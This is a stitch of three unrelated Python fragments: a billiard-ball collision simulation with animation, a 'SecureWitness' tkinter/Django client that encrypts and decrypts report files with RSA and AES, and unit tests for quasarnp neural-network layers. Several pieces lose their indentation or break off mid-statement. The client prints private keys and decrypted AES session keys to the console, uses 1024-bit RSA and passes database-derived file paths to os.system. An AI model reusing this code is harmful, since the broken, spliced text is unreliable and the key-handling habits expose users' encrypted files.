        ax.scatter(m_ani[4*upto,:,0],m_ani[4*upto,:,1],s=120)
        ax.set_xlim(-180,60)
        ax.set_ylim(-60,60)
        plt.show()
        fig = plt.figure()
        ax = fig.add_subplot(111)
        ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
        ax.plot(m_ani[:5*upto,:,0],m_ani[:5*upto,:,1])
        ax.scatter(m_ani[5*upto,:,0],m_ani[5*upto,:,1],s=120)
        ax.set_xlim(-180,60)
        ax.set_ylim(-60,60)
        plt.show()
        '''
        # One distinct color per pair of balls (x/2 is integer division).
        cm = matplotlib.cm.get_cmap('Set1')
        colors=[cm(1.*i/15) for i in range(15)]
        xy = range(15)
        colorlist=[colors[x/2] for x in xy]
        fig = plt.figure()
        ax = plt.axes(xlim=(-180, 60), ylim=(-60, 60))
        ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=300,c=colorlist,alpha=0.3)
        line, = ax.plot([], [], lw=2)
        scat = ax.scatter([], [], s = 300,c=colorlist)
        def init():
            # Clear both artists before the animation starts.
            scat.set_offsets([])
            line.set_data([], [])
            return scat, line
        def animate(i):
            # Every animation frame advances 5 stored snapshots; the line
            # traces the cue ball's (ball 0) full path so far.
            x = m_ani[5*i,:,0]; y = m_ani[5*i,:,1]
            x2 = m_ani[:5*i,0,0]; y2 = m_ani[:5*i,0,1]
            data = np.hstack((x[:5*i,np.newaxis], y[:5*i, np.newaxis]))
            scat.set_offsets(data)
            line.set_data(x2, y2)
            return scat, line
        # Keep a reference to the animation object so it is not garbage
        # collected before plt.show() returns.
        anim = animation.FuncAnimation(fig, animate, init_func=init,
                                       frames=NN/div/5, interval=1, blit=False)
        print 'done'
        plt.show()
        y += 1
    m = np.asarray(m)
    print np.shape(m)
def collision_detector(m, del_t):
    """Find colliding ball pairs and delegate their resolution to resolver().

    Two balls collide when their centers are closer than one ball diameter
    AND they are moving toward each other (their separation one time step
    ago was larger than it is now).  The approach test prevents the same
    contact from being re-resolved on consecutive steps.

    m: master list of ball states [x, y, vx, vy, id]
    del_t: simulation time step, used to rewind positions by one step
    """
    radius = 3.0
    colliding = []
    for ball_a in m:
        for ball_b in m:
            # The lexicographic state comparison visits each unordered
            # pair exactly once (mirrors the original `j > i` test).
            if not (ball_b > ball_a):
                continue
            dx = ball_a[0] - ball_b[0]
            dy = ball_a[1] - ball_b[1]
            separation = math.sqrt(dx**2 + dy**2)
            if separation < 2 * radius:
                # Separation one time step in the past.
                prev_dx = dx - del_t * (ball_a[2] - ball_b[2])
                prev_dy = dy - del_t * (ball_a[3] - ball_b[3])
                if math.sqrt(prev_dx**2 + prev_dy**2) > separation:
                    colliding.append([ball_a, ball_b])
    return resolver(m, colliding)
def resolver(m,c):
'''
The resolver takes 2 balls in c which have been determined to collide,
and changes the frame of reference so that one of them is at rest.
By doing this, one can use the principle that the ball initially with
zero velocity have a final velocity in the same direction as the vector
that connects the balls' center of masses. Additionally, the impacting ball's
final velocity will be in a direction orthogonal to this direction. This
resolver basically creates these direction vectors, and then projects
the initial velocity of the incoming ball onto these vectors to determine
the final velocities. After that is done, the translational velocity
that was subtracted to make one of the velocities zero is added back, and
then these new velocities are updated into the master list.
'''
for i in c:
k_1x = i[0][0] - i[1][0]
k_1y = i[0][1] - i[1][1]
k_2x = i[1][1] - i[0][1]
k_2y = i[0][0] - i[1][0]
rel_vel_x = i[0][2]
rel_vel_y = i[0][3]
i[1][2] = i[1][2] - i[0][2] #v2x after frame of reference | |
# Standalone desktop client / experiment script for the SecureWitness Django
# project: boots Django outside manage.py, then drives tkinter UIs and the
# RSA/AES file-encryption helpers defined below.
__author__ = 'Reid'
import os
import sys
from tkinter import *
from media.documents import *
# Point Django at the project settings before the ORM models are imported.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Project.settings')
import os
from Project.SecureWitness.models import Report, UserProfile, Upload
from django.contrib.auth.models import User
from datetime import datetime
from django.utils import timezone
import django
import tkinter as tk
from dev import encrypt
from Crypto.Cipher import AES
from Crypto import Random
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from base64 import *
import unittest
# Initialize Django's app registry so the models imported above are usable
# from this standalone (non-manage.py) script.
django.setup()
block = AES.block_size #16 bytes; pad() below pads to this block size
class App(tk.Tk):
    """Top-level tkinter application that hosts and raises the page frames."""

    def __init__(self, *args, **kwargs):
        tk.Tk.__init__(self, *args, **kwargs)
        container = tk.Frame(self)
        container.pack(side="top", fill="both", expand=True)
        container.grid_rowconfigure(0, weight=1)
        container.grid_columnconfigure(0, weight=1)
        placeholder_user = "NotAUser"
        self.frames = {}
        # Only the start page is pre-built; other pages are created on
        # demand via create_frame().
        for page_cls in (StartPage,):
            page = page_cls(self, container, self, placeholder_user)
            self.frames[page_cls] = page
            page.grid(row=0, column=0, sticky="nsew")
        self.show_frame(StartPage)

    def show_frame(self, c):
        """Raise the already-constructed frame registered for page class c."""
        self.frames[c].tkraise()
        print(self.frames)

    def create_frame(self, c, u, k):
        """Build page class c for user u (with key k) in a new Toplevel and raise it."""
        t = tk.Toplevel(self)
        container = tk.Frame(self)
        frame = c(t, container, self, u, k)
        self.frames[c] = frame
        frame.grid(row=0, column=0, sticky="nsew")
        self.show_frame(c)
class BaseFrame(tk.Frame):
    """Common base for the application's pages.

    Stores the controller, grids itself, and immediately asks the subclass
    to build its widgets via create_widgets().
    """

    def __init__(self, window, parent, controller, userIn):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.grid()
        self.create_widgets()

    def create_widgets(self):
        """Populate the frame's widgets; every page subclass must override this."""
        raise NotImplementedError
class StartPage(BaseFrame):
    """Login page: username/password/private-key entries plus Quit/Login."""

    def create_widgets(self):
        """Build the three labeled entry rows and the Quit/Login buttons."""
        # N tracks the current grid row.
        N = 0
        label = tk.Label(self, text ="This is the start page")
        label.grid(row=0)
        e1 = Entry(self)
        e3 = Entry(self)
        e2 = Entry(self)
        N+=1
        tk.Label(self, text="Username").grid(row=N)
        e1.grid(row=N, column=1)
        N+=1
        tk.Label(self, text="Password").grid(row=N)
        e3.grid(row=N, column=1)
        N += 1
        tk.Label(self, text="PrivateKey").grid(row=N)
        e2.grid(row=N, column=1)
        def login():
            # Validate the typed credentials against every Django user,
            # rebuild the pasted single-line private key into PEM form,
            # then open PageOne for the authenticated user.
            uTry = e1.get()
            pTry = e3.get()
            kTry = e2.get()
            userList = User.objects.all()
            for u in userList:
                if (uTry == u.username):
                    #print("Username is valid")
                    if(u.check_password(pTry)):
                        #print("Password is valid")
                        #try:
                        #try to make private key object
                        # Re-insert PEM line breaks at fixed offsets
                        # (header at 31, then every 65 bytes, footer at
                        # 860). NOTE(review): offsets assume a fixed-size
                        # (1024-bit) key — confirm; duplicated in
                        # decryptFile().
                        private = (kTry).encode('utf-8')
                        private = private[:31] + b'\n' + private[31:]
                        for i in range(1, 13):
                            private = private[:(31 + (65 * i))] + b'\n' + private[(31 + (65 * i)):]
                        private = private[:860] + b'\n' + private[860:]
                        priKey = RSA.importKey(private)
                        print(priKey)
                        userIn = uTry
                        self.controller.create_frame(PageOne, userIn, kTry)
                        break
                    #except:
                        #print("That is not a correct private key!")
                        #break
            # Clear all three entries whether or not the login succeeded.
            e1.delete(0, END)
            e3.delete(0, END)
            e2.delete(0, END)
        N+=1
        tk.Button(self, text='Quit', command=self.quit).grid(row=N, column=0,
                                                            sticky=W, pady=4)
        tk.Button(self, text='Login', command=login).grid(row=N, column=1,
                                                          sticky=W, pady=4)
class PageOne(BaseFrame):
    """Report browser: lists the user's own / group / shared / public /
    remaining reports as radio buttons, with decrypt and download options.

    Bypasses BaseFrame.__init__ (so create_widgets() is never called) and
    builds everything inline in __init__.
    """

    def __init__(self, window, parent, controller, userIn, priKey):
        tk.Frame.__init__(self,parent)
        # The pasted private key is stashed in a module-level global so the
        # getDocfile() callback can reach it.
        global rKey
        rKey = priKey
        #print(userIn)
        #get user from private key
        #print(priKey)
        if(userIn == None):
            # No authenticated user: show nothing.
            report_list = []
            group_report_list = []
            shared_report_list = []
            public_report_list = []
            admin_report_list = []
        else:
            # Partition all reports relative to this user: own, visible via
            # group membership, explicitly shared, public, and the rest.
            group_report_list = []
            report_list = Report.objects.filter(user__username=userIn)
            u = User.objects.get(username=userIn)
            g_list = []
            #print(u)
            for g in u.groups.all():
                g_list.append(g)
            g_report_list = Report.objects.filter(group__in=g_list).exclude(user=u).exclude(
                sharedusers=u).exclude(private=False).order_by('timestamp')
            for i in g_report_list:
                if i not in group_report_list:
                    group_report_list.append(i)
            # INTENTIONALLY DOESN'T EXCLUDE GROUPS, JUST LEAVE IT
            shared_report_list = Report.objects.filter(sharedusers=u).exclude(user=u).exclude(
                private=False).order_by('timestamp')
            public_report_list = Report.objects.filter(private=False).exclude(user=u)
            admin_report_list = Report.objects.exclude(user=u).exclude(group__in=g_list).exclude(
                sharedusers=u).exclude(private=False).order_by('timestamp')
        #List all available reports
        #d = Report.objects.all()
        #print(d)
        # Flatten the five lists into (report, ordinal) pairs for display.
        dList = []
        num = 1
        for name in report_list:
            dObject = (name, num)
            dList.append(dObject)
            num += 1
        for name in group_report_list:
            dObject = (name, num)
            dList.append(dObject)
            num += 1
        for name in shared_report_list:
            dObject = (name, num)
            dList.append(dObject)
            num += 1
        for name in public_report_list:
            dObject = (name, num)
            dList.append(dObject)
            num += 1
        for name in admin_report_list:
            dObject = (name, num)
            dList.append(dObject)
            num += 1
        BASE_DIR = os.path.dirname(os.path.abspath(__file__))
        v = IntVar()
        v.set(0)
        # var holds the timestamp of the currently selected report.
        var = StringVar()
        selections = [
            ("Decrypt", 1),
            ("Download", 2)
        ]
        decryptTrue = False
        downloadTrue = False
        def getDocfile():
            # Radio-button callback: resolve the selected report's uploads
            # to filesystem paths (Windows-style separators) and act on the
            # decrypt/download checkboxes.
            #get timestamp
            #turn into report
            report = Report.objects.get(timestamp=var.get())
            #find file(s) from report
            upload = Upload.objects.filter(report=report)
            fileList = []
            for u in upload:
                fileList.append(u.file)
            #print(fileList)
            #get address from file
            addressList = []
            address = BASE_DIR + '\\media\\'
            for f in fileList:
                addressList.append(address + str(f).replace('/', '\\'))
            #print("addressList is: ")
            #print(addressList)
            if var1.get() == 1:
                #print("DECRYPT!!")
                timestamp = var.get()
                #print(timestamp)
                #report = Report.objects.get(timestamp=var.get())
                #print(report)
                #print(userIn)
                #i = UserProfile.objects.all().filter(user__username=userIn)
                u = UserProfile.objects.get(user__username=userIn)
                # The RSA-wrapped AES key stored with the report.
                aesKeyLocked = report.aesKey
                print("aesKeyLocked is " + str(aesKeyLocked))
                #print(rKey)
                #DECRYPTION STUFF!!]
                for a in addressList:
                    print("HeyyyyOooooo")
                    print(a)
                    print(rKey)
                    print("aesKeyLocked is " + str(aesKeyLocked))
                    decryptFile(a, rKey, aesKeyLocked)
            if var2.get() == 1:
                print("Opening file at " + address)
                #os.system("start " + address)
        def decryptLink():
            print("decrypt: %d, \ndownload: %d"%(var1.get(), var2.get()))
        label2 = tk.Label(window,
                          text="""Choose a file:""",
                          justify=LEFT,
                          padx=20).grid()
        var1 = IntVar()
        Checkbutton(window,
                    justify = CENTER,
                    text="decrypt",
                    width = 20,
                    padx = 50,
                    variable = var1).grid()
        var2 = IntVar()
        Checkbutton(window,
                    justify = CENTER,
                    text="download",
                    width = 20,
                    padx = 50,
                    variable=var2).grid()
        # One radio button per report; selecting it triggers getDocfile().
        for report, val in dList:
            #print(name.docfile)
            tk.Radiobutton(window,
                           justify = CENTER,
                           text=report,
                           indicatoron=0,
                           width=20,
                           padx=50,
                           variable=var,
                           command=getDocfile,
                           value=report.timestamp).grid()
        Button(window, text="Quit", command=window.quit).grid()
        Button(window, text="Show", command=decryptLink).grid()
class PageTwo(BaseFrame):
    """Blank page: overrides __init__ to skip BaseFrame.__init__ (and thus
    create_widgets()), so no widgets are built and self.controller is not set."""
    def __init__(self, window, parent, controller, userIn):
        # Only the underlying tk.Frame is initialized; window, controller
        # and userIn are accepted for signature compatibility but unused.
        tk.Frame.__init__(self,parent)
def populateKeys():
    """Generate a fresh 1024-bit RSA key pair for every UserProfile and save it.

    The public key and the (temporarily stored) private key are both kept as
    PEM-encoded text on the profile.
    """
    for profile in UserProfile.objects.all():
        key_pair = RSA.generate(1024, Random.new().read)
        profile.tempprivate = key_pair.exportKey('PEM')
        profile.publickey = key_pair.publickey().exportKey('PEM')
        profile.save()
def encryptFile(fileIn, publickey):
    """Encrypt fileIn with a fresh AES session key; return that key
    RSA-wrapped (PKCS1-OAEP) with the given public key.

    Args:
        fileIn: path of the file to encrypt (dev.encrypt.Encrypt writes the
            ciphertext — presumably to a '.enc' sibling, given how callers
            use it; confirm against dev/encrypt.py).
        publickey: public RSA key material as a single-line string; PEM
            newlines are re-inserted at fixed offsets below.

    Returns:
        The OAEP-encrypted AES key (bytes).
    """
    aesKey = Random.new().read(16)
    print("aesKeyUnlocked is " + str(aesKey))
    encrypt.Encrypt(fileIn, aesKey)
    # Rebuild the PEM layout: break after the 26-char header, then one
    # break every 65th byte, then the footer break at offset 246.
    # NOTE(review): offsets assume a fixed-length (1024-bit) public key.
    pKey = (publickey).encode('utf-8')
    public_key = pKey[:26] + b'\n' + pKey[26:]
    for i in range(1, 4):
        public_key = public_key[:(26 + (65 * i))] + b'\n' + public_key[(26 + (65 * i)):]
    public_key = public_key[:246] + b'\n' + public_key[246:]
    pubKey = RSA.importKey(public_key)
    cipher = PKCS1_OAEP.new(pubKey)
    aesKeyLocked = cipher.encrypt(aesKey)
    return aesKeyLocked
def decryptFile(fileIn, privkey, aesKeyLocked):
    """Unwrap the AES session key with the RSA private key, then decrypt fileIn.

    Args:
        fileIn: path to the encrypted file (encryptFile's '.enc' output).
        privkey: RSA private key as a single-line string; PEM newlines are
            re-inserted at fixed offsets below (assumes a 1024-bit key, the
            same layout rebuilt in StartPage.login).
        aesKeyLocked: the PKCS1-OAEP-encrypted AES key bytes exactly as
            returned by encryptFile().

    Raises:
        ValueError: from PKCS1_OAEP.decrypt when the key does not match.
    """
    # Rebuild the PEM layout: break after the 31-char header, then one
    # break every 65th byte, then before the footer at offset 860.
    private = (privkey).encode('utf-8')
    private = private[:31] + b'\n' + private[31:]
    for i in range(1, 13):
        private = private[:(31 + (65 * i))] + b'\n' + private[(31 + (65 * i)):]
    private = private[:860] + b'\n' + private[860:]
    priKey = RSA.importKey(private)
    uncipher = PKCS1_OAEP.new(priKey)
    # BUG FIX: aesKeyLocked is already the raw ciphertext bytes produced by
    # PKCS1_OAEP.encrypt() in encryptFile(); the old code called .encode()
    # on bytes (an AttributeError) and zero-padded / str-decoded the RSA
    # ciphertext, which can never decrypt. Pass the ciphertext through
    # unchanged.
    aesKeyUnlocked = uncipher.decrypt(aesKeyLocked)
    print("aesKeyUnlocked is " + str(aesKeyUnlocked))
    encrypt.Decrypt(in_file=fileIn, key=aesKeyUnlocked)
def pad(s):
    """Zero-pad byte string s up to a whole number of AES blocks.

    Note: when len(s) is already a multiple of the block size, one full
    extra block of zero bytes is appended (preserved original behavior).
    """
    shortfall = AES.block_size - len(s) % AES.block_size
    return s + b"\0" * shortfall
def startApp():
    """Tk demo/sandbox window: assorted labels, buttons and widgets, plus an
    inline end-to-end encrypt/decrypt smoke run against hard-coded media
    files and Django users. Blocks in root.mainloop(); returns 0 after the
    window closes.

    NOTE(review): mixes UI demo code with database/crypto side effects
    (encryptFile/decryptFile on fixed paths, Windows-style separators and
    'start' shell command) — not production code.
    """
    root = Tk()
    w = Label(root, text="Hello!")
    w.pack()
    BASE_DIR = os.path.dirname(os.path.abspath(__file__))
    logo = PhotoImage(file=BASE_DIR+"/static/meme_small.gif")
    w1 = Label(root, image=logo).pack(side="right")
    explanation = """at present, only
GIF and PPM/PGM
formats are supported,
but an interface
exists to allow
additional image file
formats to be added
easily."""
    w2 = Label(root,justify=LEFT,
               padx = 0,
               pady = 0,
               text=explanation).pack(side="left")
    Label(root,
          justify=CENTER,
          padx = 100,
          text = "Red Text in Times Font",
          fg = "red",
          font = "Times").pack()
    Label(root,
          text = "Green Text in Helvetica Font",
          fg = "light green",
          bg = "dark green",
          font = "Helvetica 16 bold italic").pack()
    Label(root,
          text = "Blue Text in Verdana bold",
          fg = "blue",
          bg = "yellow",
          font = "Verdana 10 bold").pack()
    quote = "This is a quote, and it's going to be misquoted for the rest of eternity. \n(<NAME>)"
    msg = Message(root, text = quote)
    msg.config(bg='lightgreen', font=('times',24,'italic'))
    msg.pack()
    class Appp:
        # Minimal two-button frame (QUIT / Hello) embedded in the demo.
        def __init__(self, root):
            frame = Frame(root)
            frame.pack()
            self.button = Button(frame,
                                 text="QUIT",fg="red",
                                 command=frame.quit)
            self.button.pack(side=LEFT)
            self.slogan = Button(frame,
                                 text="Hello",
                                 command=self.write_slogan)
            self.slogan.pack(side=LEFT)
        def write_slogan(self):
            #print("Hello you idiot!")
            pass
    app = Appp(root)
    f1 = Frame(root)
    v = IntVar()
    v.set(0)
    languages = [
        ("Python",1),
        ("Perl",2),
        ("Java",3),
        ("C++",4),
        ("C",5)
    ]
    var = StringVar()
    # Enumerate every report as (report, ordinal) pairs (unused below).
    d = Report.objects.all()
    dList = []
    num = 1
    for name in d:
        dObject = (name, num)
        dList.append(dObject)
        num+=1
    def getDocfile():
        # Open the file selected in `var` with the Windows shell.
        dLink = var.get().replace('/','\\')
        address = BASE_DIR + '\\media\\' + dLink
        #print("Opening file at " + address)
        os.system("start "+address)
    Label(root,
          text="""Choose a file:""",
          justify = LEFT,
          padx = 20).pack()
    frame = Frame(root)
    frame.pack()
    bottomFrame = Frame(root)
    bottomFrame.pack(side = BOTTOM)
    frame2 = Frame(root)
    frame2.pack(side = RIGHT)
    redButton = Button(frame, text="Red", fg="red")
    redButton.pack(side = LEFT)
    greenButton = Button(frame, text="Brown", fg="brown")
    greenButton.pack(side = LEFT)
    blueButton = Button(frame2, text="Blue", fg="blue")
    blueButton.pack(side = LEFT)
    blackButton = Button(bottomFrame, text="Black", fg="black")
    blackButton.pack(side =BOTTOM)
    #root.geometry("600x400+200+200")
    root.title("StandAloneApp Test")
    # Round-trip smoke test: encrypt a fixed PDF with User1's public key,
    # then decrypt the '.enc' output with the matching private key.
    BASE_DIR = os.path.dirname(os.path.abspath(__file__))
    dLink = var.get().replace('/', '\\')
    address = BASE_DIR + "\media\\files\\2015\\12\\06\\Llamas DB Poster 1-v1.pdf"
    user = UserProfile.objects.get(user__username='User1')
    pubKey = user.publickey
    aesKeyLocked = encryptFile(address,pubKey)
    print("1")
    print(type(aesKeyLocked))
    print("aesKeyLocked is " + str(aesKeyLocked))
    print("2")
    #need .enc after
    priKey = user.tempprivate # to be given in App
    #aesKeyLocked = aesKeyLocked.encode('utf-8')
    print("3")
    print(type(aesKeyLocked))
    print(aesKeyLocked)
    decryptFile(address+".enc",priKey,aesKeyLocked)
    #Encrypt with whatever public key you want the owner of to see
    #Decrypt with private key of public key
    r = Report.objects.filter(user__username="admin")
    #r = Report.objects.all()
    for r2 in r:
        #print(r2.key)
        u = Upload.objects.all()
        for u2 in u:
            #Get
            pass
    #print(r)
    """
    up = UserProfile.objects.get(user__username=uTry)
    print(up.publickey)
    """
    root.mainloop()
    return 0
def encryptEasy(fileName, userName):
    """Encrypt a file from the fixed media upload folder for userName.

    Looks up the user's stored public key, encrypts the file via
    encryptFile(), and returns the RSA-wrapped AES session key.
    """
    base_dir = os.path.dirname(os.path.abspath(__file__))
    #Change dates if necessary
    target = base_dir + "\media\\files\\2015\\12\\07\\" + fileName
    profile = UserProfile.objects.get(user__username=userName)
    aesKeyLocked = encryptFile(target, profile.publickey)
    print("aesKeyLocked is " + str(aesKeyLocked))
    return aesKeyLocked
if __name__ == '__main__':
#populateKeys()
#startApp()
#EncryptEasy File
fileName = "ACM_Code_of_Ethics_Essay.docx"
userName = "admin"
aesKeyLocked = encryptEasy(fileName, userName) #string
print("aesKeyLocked is " | |
import math
import unittest
import numpy as np
from quasarnp.layers import (batch_normalization, conv1d, dense, flatten,
linear, relu, sigmoid)
class TestActivations(unittest.TestCase):
    """Unit tests for the scalar/elementwise activation functions."""

    def test_linear(self):
        # Identity behavior on plain integers, positive and negative.
        self.assertEqual(linear(0), 0)
        self.assertEqual(linear(1), 1)
        self.assertEqual(linear(-1), -1)
        # Identity behavior on 1d and 2d numpy arrays.
        values = np.arange(-10, 10)
        self.assertTrue(np.allclose(linear(values), values))
        grid = values.reshape(-1, 5)
        self.assertTrue(np.allclose(linear(grid), grid))

    def test_relu(self):
        # Negatives clamp to zero for scalars.
        self.assertEqual(relu(0), 0)
        self.assertEqual(relu(1), 1)
        self.assertEqual(relu(-1), 0)
        # Negatives clamp elementwise for 1d and 2d arrays.
        values = np.arange(-10, 10)
        clamped = np.asarray([0] * 11 + [1, 2, 3, 4, 5, 6, 7, 8, 9])
        self.assertTrue(np.allclose(relu(values), clamped))
        self.assertTrue(np.allclose(relu(values.reshape(-1, 5)),
                                    clamped.reshape(-1, 5)))

    def test_sigmoid(self):
        # Known closed-form values for scalars.
        self.assertEqual(sigmoid(0), 0.5)
        self.assertEqual(sigmoid(1), 1 / (1 + 1 / math.e))
        self.assertEqual(sigmoid(-1), 1 / (1 + math.e))
        # Matches the logistic formula elementwise for 1d and 2d arrays.
        values = np.arange(-10, 10)
        logistic = 1 / (1 + np.exp(-values))
        self.assertTrue(np.allclose(sigmoid(values), logistic))
        self.assertTrue(np.allclose(sigmoid(values.reshape(-1, 5)),
                                    logistic.reshape(-1, 5)))
class TestLayers(unittest.TestCase):
# For this test class we will assume that the activations are correct.
# We test those separately up above anyway.
def test_dense_weights(self):
# This test has all weights set to 0, but nonzero/nonunity bias
# This should mean the result is only the bias relu'd.
in_weights = np.zeros((11, 5))
in_bias = np.arange(-2, 3)
in_x = np.arange(-5, 6)
observed = dense(in_x, in_weights, in_bias, relu)
expected = [0, 0, 0, 1, 2]
self.assertTrue(np.allclose(observed, expected))
# Setting the weights to 1 and ensuring the answer remains correct.
# Since the input x array is symmetric the pre bias answer is still
# zeros.
in_weights = np.ones((11, 5))
observed = dense(in_x, in_weights, in_bias, relu)
expected = [0, 0, 0, 1, 2]
self.assertTrue(np.allclose(observed, expected))
def test_dense_bias(self):
# This test has all biases set to 0, but nonzero/nonunity weights
in_weights = [[1, 1, -5, -1, -1],
[1, 2, -4, -1, -2],
[1, 3, -3, -1, -3],
[1, 4, -2, -1, -4],
[1, 5, -1, -1, -5]]
in_weights = np.asarray(in_weights)
in_bias = np.zeros(5)
in_x = np.arange(-2, 3)
observed = dense(in_x, in_weights, in_bias, relu)
expected = [0, 10, 10, 0, 0]
self.assertTrue(np.allclose(observed, expected))
# Testing if we set the bias to 1 that the answer remains correct
# NOTE: The last weights product equals -10 so adding the
# 1 does not change the answer of the relu.
in_bias = np.ones(5)
observed = dense(in_x, in_weights, in_bias, relu)
expected = [1, 11, 11, 1, 0]
self.assertTrue(np.allclose(observed, expected))
# For testing flatten we need to test that the
# array only flattens everything except the first dimension AND
# that the flatten flattens in the correct order
# We split the tests by dimensionality to help diagnose any problems.
def test_flatten_2d(self):
# Creates array that looks like this:
# [1, 1, 1]
# [2, 2, 2]
# [3, 3, 3]
column = np.asarray([1, 2, 3])
in_x = np.asarray([column] * 3).T
# "Flatten" which does nothing here since we flatten higher dimensions
observed = flatten(in_x)
expected = in_x
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
def test_flatten_3d(self):
# Creates the following 3d array:
# [[[0 1], [2 3]],[[4 5],[6 7]]]
in_x = np.arange(0, 2 * 2 * 2).reshape((2, 2, 2))
# Flatten and test
observed = flatten(in_x)
expected = np.asarray([[0, 1, 2, 3], [4, 5, 6, 7]])
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
def test_flatten_4d(self):
# Creates the following 4d array:
# [[[[0 1], [2 3]], [[4 5], [6 7]]],
# [[[8 9], [10 11]], [[12 13], [14 15]]]]
in_x = np.arange(0, 2 * 2 * 2 * 2).reshape((2, 2, 2, 2))
# Flatten and test
observed = flatten(in_x)
expected = [[0, 1, 2, 3, 4, 5, 6, 7], [8, 9, 10, 11, 12, 13, 14, 15]]
expected = np.asarray(expected)
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# This tests batchnormalizing a scalar
def test_batch_normalization_scalar(self):
eps = 1e-7 # To avoid divide by zero errors
x = 3
mu = 2
var = 2
gamma = 1
beta = 0
# First test gamma = 1, beta = 0 so no scaling or offset
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = 1 / np.sqrt(2)
self.assertTrue(np.allclose(observed, expected))
# Scale by double
gamma = 2
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = 2 / np.sqrt(2)
self.assertTrue(np.allclose(observed, expected))
# Offset by one and scale by double.
beta = 1
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = 2 / np.sqrt(2) + 1
self.assertTrue(np.allclose(observed, expected))
# We here use a 2d vector instead of a scalar to make sure the array logic
# works out correctly
def test_batch_normalization_vector(self):
eps = 1e-7 # To avoid divide by zero errors
x = np.asarray([3, 2, 1])
mu = np.asarray([2, 2, 2])
var = np.asarray([2, 2, 2])
gamma = 1
beta = 0
# First test gamma = 1, beta = 0 so no scaling or offset
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = [1 / np.sqrt(2), 0, -1 / np.sqrt(2)]
self.assertTrue(np.allclose(observed, expected))
# Scale by double
gamma = 2
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = [2 / np.sqrt(2), 0, -2 / np.sqrt(2)]
self.assertTrue(np.allclose(observed, expected))
# Offset by one and scale by double.
beta = 1
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = [2 / np.sqrt(2) + 1, 1, -2 / np.sqrt(2) + 1]
self.assertTrue(np.allclose(observed, expected))
def test_conv1d_base(self):
# Shape (batch_size, in_width, in_channels)
x = np.ones((5, 200, 5))
# Shape (filter_width, in_channels, out_channels)
w = np.ones((5, 5, 5))
# We expect that with the 25 filters that the convolution will give 25
# i.e. the sum of 25 ones
observed = conv1d(x, w)
expected = np.ones((5, 196, 5)) * 25
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Doubling the input to make extra sure it's good
x = x * 2
observed = conv1d(x, w)
expected = np.ones((5, 196, 5)) * 50
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Testing a more dynamic x array.
x = np.asarray([[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5]]).reshape(3, -1, 1)
w = np.ones((3, 1, 2))
observed = conv1d(x, w)
expected = [[[6, 6], [9, 9], [12, 12]],
[[6, 6], [9, 9], [12, 12]],
[[6, 6], [9, 9], [12, 12]]]
expected = np.asarray(expected)
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Same test as above, but where we set the stride to 2 instead of 1.
def test_conv1d_stride(self):
# Shape (batch_size, in_width, in_channels)
x = np.ones((5, 200, 5))
# Shape (filter_width, in_channels, out_channels)
w = np.ones((5, 5, 5))
# We expect that with the 25 filters that the convolution will give 25
# i.e. the sum of 25 ones
observed = conv1d(x, w, stride=2)
expected = np.ones((5, 98, 5)) * 25
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Doubling the input to make extra sure it's good
x = x * 2
observed = conv1d(x, w, stride=2)
expected = np.ones((5, 98, 5)) * 50
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Testing a more dynamic x array.
x = np.asarray([[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5]]).reshape(3, -1, 1)
w = np.ones((3, 1, 2))
observed = conv1d(x, w, stride=2)
expected = [[[6, 6], [12, 12]],
[[6, 6], [12, 12]],
[[6, 6], [12, 12]]]
expected = np.asarray(expected)
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Same test as base, but we add a bias vector of ones.
def test_conv1d_bias(self):
# Shape (batch_size, in_width, in_channels)
x = np.ones((5, 200, 5))
# Shape (filter_width, in_channels, out_channels)
w = np.ones((5, 5, 5))
# Shape (out_channels)
b = np.ones(5)
# We expect that with the 25 filters that the convolution will give 25
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.